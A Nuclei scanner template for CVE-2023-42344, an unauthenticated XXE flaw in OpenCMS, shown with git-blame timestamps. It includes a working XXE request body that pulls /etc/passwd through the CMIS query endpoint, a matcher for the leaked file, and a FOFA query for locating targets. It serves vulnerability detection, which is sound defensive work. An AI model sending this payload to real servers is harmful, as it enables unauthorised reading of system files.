nuclei-templates/http/cves/2023/CVE-2023-42344.yaml

40 lines
1.9 KiB
YAML
Raw Normal View History

2024-02-20 12:30:27 +00:00
id: CVE-2023-42344
2024-02-22 07:08:41 +00:00
2024-02-20 12:30:27 +00:00
info:
2024-02-22 07:08:41 +00:00
name: OpenCMS - Unauthenticated XXE
2024-02-22 07:39:01 +00:00
author: 0xr2r
2024-02-20 12:30:27 +00:00
severity: high
description: |
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
2024-02-22 07:08:41 +00:00
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
2024-02-20 12:30:27 +00:00
reference:
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
metadata:
2024-02-22 07:08:41 +00:00
verified: true
2024-02-20 12:30:27 +00:00
max-request: 1
fofa-query: "OpenCms-9.5.3"
2024-02-22 07:08:41 +00:00
tags: cve,cve2023,xxe,opencms
2024-02-20 12:30:27 +00:00
http:
- method: POST
path:
- "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
- "{{BaseURL}}/cmisatom/cmis-online/query"
headers:
2024-02-22 07:08:41 +00:00
Content-Type: "application/xml;charset=UTF-8"
Referer: "{{RootURL}}"
2024-02-20 12:30:27 +00:00
body: |
<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
stop-at-first-match: true
matchers-condition: and
matchers:
2024-02-22 07:08:41 +00:00
- type: regex
2024-02-20 12:30:27 +00:00
part: body
2024-02-22 07:08:41 +00:00
regex:
- "root:.*:0:0:"
- "invalidArgument"
2024-02-20 12:30:27 +00:00
condition: and
2024-02-22 07:39:01 +00:00
# digest: 490a0046304402207109561f9ee225ddc24e0e2428763262bbd09665f2d2e30980f46c87af7476fd02206d213db222bf432261211cadb7e9cdc0f4431ad34f41a444becca4917fa9d2ec:922c64590222798bb761d5b6d8e72950